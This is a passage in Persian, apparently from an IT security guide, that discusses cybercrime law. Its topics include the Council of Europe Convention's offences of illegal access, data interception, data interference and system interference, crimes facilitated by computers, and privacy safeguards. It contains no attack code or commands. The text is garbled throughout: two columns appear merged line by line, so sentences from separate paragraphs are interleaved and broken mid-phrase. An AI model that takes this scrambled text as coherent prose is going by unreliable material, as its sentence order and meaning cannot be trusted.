‫ﺍﺳﺖ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ ﺭﺍ ﺍﺯ ﺭﻓﺘﺎﺭﻫـﺎﻱ ﻣﻌﻤـﻮﻟﻲ‬ ‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )ﺑـﺎ‬
‫ﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺜﻞ ﺍﺭﺳـﺎﻝ ﻳـﻚ ﻳـﺎ ﭼﻨـﺪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ‬ ‫ﻫﻤﻜﺎﺭﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺒـﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ(‬
‫ﻧﺎﺧﻮﺍﺳﺘﻪ ﻣﺠﺰﺍ ﻣﻲﺳﺎﺯﺩ‪.‬‬ ‫ﺍﻗﺪﺍﻣﺎﺕ ﻻﺯﻡ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ‪ .‬ﭘﻴـﺸﻨﻬﺎﺩ ﻗﻄﻌﻨﺎﻣـﺔ ‪ ۵۵/۶۳‬ﻧﻴـﺰ‬
‫ﺁﻣﻮﺯﺵ ﻗﻮﺍﻧﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ‪.‬‬
‫ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ :٨٣‬ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﻪ‬ ‫•‬
‫ﺳﻴــﺴﺘﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺷﺨــﺼﻲ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻱ‬
‫ﺳﺮﭘﻴﭽﻲ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿﻮﻋﺔ ﺟﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻣﺘﺮﺍﺩﻑ "ﺗﻌﺪﻱ" ﺩﺍﻧﺴﺖ‪) .‬ﺍﺯ ﻳﻚ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﻣﺘـﺼﻮﺭ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﺩﻳﺪﮔﺎﻩ ﺩﻳﮕﺮ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ ،‬ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ‬


‫ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺗﻬﺪﻳﺪﻱ ﺑـﺮﺍﻱ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ‬ ‫ﺍﺳﺖ‪ ،‬ﻭ ﺑﺮﺍﻱ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻧﻴـﺰ ﻧﺎﻣﻬـﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ‬
‫ﺍﺳﺖ(‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﻘـﻮﻗﻲ ﺗﻌﺮﻳـﻒ ﺩﺳﺘﺮﺳـﻲ‬ ‫ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣــﺎ ﺩﺭ ﻣﺠﻤــﻮﻉ‪ ،‬ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻣــﻮﺭﺩ ﺟــﺮﺍﺋﻢ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺴﺘﻨﺪ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺩﺳﺘﺔ ﺯﻳﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪:‬‬
‫ﻣﺤﺮﻣﺎﻧــﻪ )ﻣﺜــﻞ ﺍﻃﻼﻋــﺎﺕ ﭘﺰﺷــﻜﻲ ﻳــﺎ ﻣــﺎﻟﻲ( ﺩﺭﻳﺎﻓــﺖ‪،‬‬
‫ﺩﺯﺩﻱ ﺩﺍﺩﻩﻫﺎ‪ :٨٠‬ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺗﻌﻤـﺪﻱ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺍﺯ‬ ‫•‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻳﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ‬
‫ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﻳﻚ ﻣﻌﺎﻫﺪﻩ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻣﻨﺘﺸﺮ ﻛـﺮﺩﻩ‬ ‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺷـﺨﺎﺹ ﺍﺷـﺎﺭﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺪﻫﺎﻱ ‪ ۲‬ﺗﺎ ‪ ۵‬ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺨﻠﻔـﺎﺕ‬ ‫ﻛــﺮﺩ‪ .‬ﺍﻳــﻦ ﻗــﻮﺍﻧﻴﻦ ﺑــﻪ ﻗــﺼﺪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻣﺤﺮﻣــﺎﻧﮕﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﭼﻬﺎﺭ ﻣﻮﺭﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺟﺮﺍﺋﻢ ﺍﺳﺎﺳـﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬ ‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻬﻴﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﺎﻡ ﻣﻲﺑﺮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺧـﻮﺩ ﻣﻌﺎﻫـﺪﻩ ﺑﻄـﻮﺭ‬ ‫ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻈﺎﻣﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺩﻧﻴﺎ‪ ،‬ﺭﺩﻳـﺎﺑﻲ‬
‫ﻣﻔﺼﻞ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺭﺍ‬ ‫ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﺭﺍ ﺟـﺮﻡ ﻣـﻲ ﺩﺍﻧﻨـﺪ؛ ﻭ ﺍﻳـﻦ‬
‫ﺩﺭ ﺑﺮ ﮔﻴﺮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﺍﺭﺍﻱ ﮔﺰﺍﺭﺷﻲ ﺗﻮﺻﻴﻔﻲ ﺍﺳﺖ ﻛﻪ ﺑـﻪ‬ ‫ﻣﻔﻬﻮ ﹺﻡ ﺧﻮﺵﺗﻌﺮﻳﻒ ﺩﺭ ﺟﻬﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻠﻔﻨﻲ ﻣﻲ ﺗﻮﺍﻧـﺪ‬
‫ﺗﻌﺒﻴﺮ ﺁﻥ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻨﺪ ‪ ۲‬ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﺑﻪ ﻣﻘﺎﺑﻠـﻪ‬ ‫ﻛﺎﺭﻛﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ )ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺗﻤـﺎﻡ ﻳـﺎ ﺑﺨـﺸﻲ ﺍﺯ‬
‫ﺗﺪﺍﺧﻞ ﺩﺍﺩﻩﻫﺎ‪ :٨١‬ﺗﺨﺮﻳـﺐ‪ ،‬ﺣـﺬﻑ‪ ،‬ﻳـﺎ ﺗﻐﻴﻴـﺮ ﺗﻌﻤـﺪﻱ ﻭ‬ ‫•‬
‫ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ( ﻓﺮﺍ ﻣﻲﺧﻮﺍﻧﺪ‪ .‬ﺩﺭ ﻇﺎﻫﺮ‪ ،‬ﺍﻳﻦ ﻣﺎﺩﻩ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛـﻪ‬
‫ﻼ ﺍﺭﺳــﺎﻝ‬
‫ﻏﻴﺮﻣﺠــﺎﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﺭﺍﻳﺎﻧــﺔ ﺩﻳﮕــﺮﺍﻥ‪ .‬ﻣــﺜ ﹰ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺭﺳﺎﻝ ﻣﻲ ﻧﻤﺎﻳﻨﺪ ﻣﺠﺮﻡ ﻣﻲ ﺷـﻤﺎﺭﺩ‪،‬‬
‫‪78 Substantive Law‬‬
‫‪79 Procedural Law‬‬
‫‪82‬‬ ‫‪System Interference‬‬ ‫‪80‬‬ ‫‪Data Interception‬‬
‫‪83‬‬ ‫‪Illegal Access‬‬ ‫‪81‬‬ ‫‪Data Interference‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٤٨‬‬

‫ﻣﺘﻨﺎﺳﺐ‪ ،‬ﺟﺮﺍﺋ ﹺﻢ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺑـﺪﺗﺮ ﺍﺯ ﺟـﺮﺍﺋﻢ‬ ‫ﭼﺮﺍﻛﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﺑﺪﻭﻥ ﺍﺟﺎﺯﻩ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ )ﻭ ﻳـﺎ‬
‫ﻣﺸﺎﺑﻪ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺟﻠﻮﻩ ﺩﻫﻨﺪ‪.‬‬ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ﭘـﺴﺘﻲ ﮔﻴﺮﻧـﺪﻩ( ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﺑﺮﺍﺳﺎﺱ ﺍﻳﻦ ﺗﻔـﺴﻴﺮ‪ ،‬ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ‬
‫ﻛﺎﺭﺑﺮﺩ ﻣﻔﺎﻫﻴﻢ ﭘﺎﻳﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺟﺰﺍ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﻭﺷﻦ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ "ﺑﺪﻭﻥ ﺍﺟـﺎﺯﻩ" ﻫﻤـﺎﻥ‬
‫ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻔﺎﻫﻴﻢ ﻣﻌﻤﻮﻝ ﺩﺭ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ‬ ‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻌﻤﻮﻝ ﻭ ﺫﺍﺗـﻲ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺳـﺖ ﻛـﻪ ﺑﻄـﻮﺭ ﺭﻭﺯﻣـﺮﻩ‬
‫ﻣﺎﻧﻨـﺪ "ﻣﻌﺎﻭﻧــﺖ ﺩﺭ ﺟــﺮﻡ" ﻳــﺎ "ﻗـﺼﺪ" ﺭﺍ ﻧﻴــﺰ ﺩﺭ ﺣــﻮﺯﺓ ﺟــﺮﺍﺋﻢ‬ ‫ﻼ ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﻪﻫــﺎﻱ‬
‫ﻫﻤــﻮﺍﺭﻩ ﺩﺭ ﺁﻥ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ؛ ﻣــﺜ ﹰ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻗـﺎﻧﻮﻥ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻔﺤﺎﺕ ﻭﺏ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺟﺮﺍﺋﻢ ﻋﺎﺩﻱ ﻣﻔﻬﻮﻡ "ﻗﺼﺪ ﺗﺨﻠﻒ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ‪ ،‬ﺩﺭ‬ ‫ﻣﺴﺘﻘﻴﻢ ﻳﺎ ﻓﺮﺍﻣﺘﻦ‪ ،٨٤‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪cookie‬ﻫـﺎ ﻳـﺎ‬
‫ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﻫﻤﺎﻥ ﻣﻔﻬﻮﻡ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩ‪.‬‬ ‫‪bot‬ﻫﺎ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﻗﺼﺪ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‬
‫ﺟﺮﺍﺋﻢ ﺗﺴﻬﻴﻞﺷﺪﻩ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺟﺮﻡ" ﻭ ﻳﺎ "ﻗﺼﺪ ﺍﻧﺠﺎﻡ ﺟﺮﻡ" ﻣﻄـﺮﺡ‬
‫ﺷﻮﺩ؛ ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﻳﺮﻭﺱ ﺑـﻪ ﺩﺭﺳـﺘﻲ ﻋﻤـﻞ ﻧﻜﻨـﺪ‪ .‬ﺑـﻪ‬ ‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻪﺗﻨﻬﺎ ﺷﺎﻣﻞ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩ ﻣﺘﺨﻠـﻒ‬
‫ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻔﻬﻮﻡ "ﻣﻌﺎﻭﻧـﺖ ﺩﺭ ﺟـﺮﻡ" ﺭﺍ‬ ‫ﺑﺮ ﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ ،‬ﺑﻠﻜﻪ ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺗﻌﺮﻳﻒ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﺩﺭ ﺣﻮﺯﻩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺯ‬ ‫ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑـﺮ ﻣـﻲﮔﻴـﺮﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‬
‫ﻼ ﺍﮔـﺮ ﻛـﺴﻲ‬ ‫ﻫﻤﺎﻥ ﺗﻌﺎﺭﻳﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪ ،‬ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﺜ ﹰ‬ ‫ﺳﺮﻗﺖ ﻭ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺟﺮﺍﺋﻤﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺑﺼﻮﺭﺕ ﻋﻤﺪﻱ ﻳﻚ ﻭﻳﺮﻭﺱ ﺗﻮﻟﻴﺪ ﻛﻨـﺪ‪ ،‬ﺣﺘـﻲ ﺍﮔـﺮ ﻭﻳـﺮﻭﺱ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺗﻤﺎﻣﻲ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺗﻮﺳﻂ ﺷﺨﺺ ﺩﻳﮕـﺮﻱ ﺑـﻪ ﺷـﺒﻜﻪ ﺭﺍﻩ ﻳﺎﻓﺘـﻪ ﺑﺎﺷـﺪ‪ ،‬ﺑـﺎﺯ ﻫـﻢ‬ ‫ﺍﻣــﺎ ﺳــﺮﻗﺖ ﻭ ﻛﻼﻫﺒــﺮﺩﺍﺭﻱ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﺻــﻮﺭﺕ‬
‫ﺷﺨﺺ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ ﺩﺭ ﻗﺒـﺎﻝ ﺧﺮﺍﺑﻴﻬـﺎﻳﻲ ﻛـﻪ ﺁﻥ ﻭﻳـﺮﻭﺱ ﺩﺭ‬ ‫ﻣﻲﮔﻴﺮﺩ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺗﺨﻠﻔﺎﺗﻲ ﻫﻤﭽﻮﻥ ﺳﺮﻗﺘﻬﺎﻱ ﺍﺩﺑـﻲ ﻭ‬
‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﻓﻜﺮﻱ ﻳﺎ ﺍﻧﺘﺸﺎﺭ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﺑﻪ ﺟﺮﺍﺋﻢ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻤﻲﺷﻮﻧﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﺨﻠﻔﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬ ‫ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ‪ ،‬ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﺟـﺮﺍﺋﻢ‬
‫ﺗﻮﺟﻪ ﺑﻪ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﺎﻟﺒﹰﺎ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺳﺆﺍﻻﺗﻲ‬ ‫ﻣﻮﺟﻮﺩ‪ ،‬ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺗﺤﻠﻴـﻞ ﺩﻗﻴـﻖ‬
‫ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺩﻭﻟﺖ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻧﻬـﺎ ﺣـﻖ‬ ‫ﻣﻲﺷﻮﺩ‪ ،‬ﻣﺜ ﹰ‬ ‫ﻋﻮﺍﻣﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻨﮕﻮﻧﻪ ﺟﺮﺍﺋﻢ ﻣﺴﺘﻠﺰﻡ ﺑﺮﺭﺳﻲ ﺗﻄﺒﻴﻘﻲ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﭘﻴـﺪﺍ‬ ‫ﺟﻨﺎﻳﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ‪ ،‬ﻭ ﺩﺭ ﺍﻳـﻦ‬
‫ﻣﻲﻛﻨﺪ ‪ -‬ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﻮﺍﻫﺪﻱ ﺑـﺮ ﺍﻧﺠـﺎﻡ ﺟـﺮﺍﺋﻢ‬ ‫ﺭﺍﺳﺘﺎ ﻗﺎﺋﻞ ﺷﺪﻥ ﺗﻔﺎﻭﺕ ﻣﻴﺎﻥ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺟﺮﺍﺋﻤﻲ ﻛـﻪ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺗﺨﻠﻔﺎﺕ ﺑﺎﺷﻨﺪ ‪ -‬ﻛﺪﺍﻣﻨﺪ؟ ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬ ‫ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺩﻭﻟـﺖ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ‬ ‫ﺑﻨﺪﻫﺎﻱ ‪ ۷‬ﺗﺎ ‪ ۱۰‬ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺍﺯ ﺍﻳـﻦ ﻣﻔﻬـﻮﻡ ﻓﺎﺻـﻠﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨـﺪ‪ .‬ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ‬ ‫ﻣﻲﮔﻴﺮﺩ ﻭ ﺑﺼﻮﺭﺕ ﻛﻠﻲﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻤﻲ ﺻـﺤﺒﺖ ﻣـﻲﻛﻨـﺪ‬
‫ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺳــﺘﻮﺭﺍﺕ ﻗــﻀﺎﻳﻲ ﺑــﺮﺍﻱ ﺑﺮﺭﺳــﻲ ﺩﺍﺩﻩﻫــﺎﻱ‬ ‫ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻤﻨﻈﻮﺭ ﺗﺴﻬﻴﻞ ﺍﻧﺠﺎﻡ ﺁﻧﭽﻪ ﻛﻪ ﺧـﺎﺭﺝ‬
